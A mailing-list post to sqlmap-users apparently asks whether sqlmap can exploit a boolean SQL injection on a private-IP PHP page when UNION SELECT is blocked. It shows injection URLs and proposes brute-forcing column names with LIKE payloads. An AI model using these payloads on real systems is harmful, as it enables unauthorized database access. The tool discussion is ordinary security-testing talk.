Hi,
I'm checking that sqlmap can't work with this injection, or maybe I can't
see the correct option.
Injection is like this:
Original URL:
http://10.0.17.252/stat.php?id=534&key=a4d80eac9ab26a4a2da04125bc2c096a
Injection:
http://10.0.17.252/stat.php?id=534' AND
'1'='1&key=a4d80eac9ab26a4a2da04125bc2c096a
The problem is that mysql user can't run UNION SELECT, so if I run sqlmap
detect injection but shows nothing.
Maybe is a good idea implement a bruteforce attack to retrieve columns.
Example:
http://10.0.17.252/stat.php?id=534' AND `name` LIKE
'%&key=a4d80eac9ab26a4a2da04125bc2c096a => Shows normal page, then `name`
columns exist.
http://10.0.17.252/stat.php?id=534' AND `name2` LIKE
'%&key=a4d80eac9ab26a4a2da04125bc2c096a => Shows "Wrong query", so this
columns don't exist.
I tried with --common-columns, but needs the name of the table, and we don't
know this value.
It's only a idea.
Thanks for all.
------------------------------------------------------------------------------
All the data continuously generated in your IT infrastructure contains a
definitive record of customers, application performance, security
threats, fraudulent activity and more. Splunk takes this data and makes
sense of it. Business sense. IT sense. Common sense.
http://p.sf.net/sfu/splunk-d2dcopy1
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users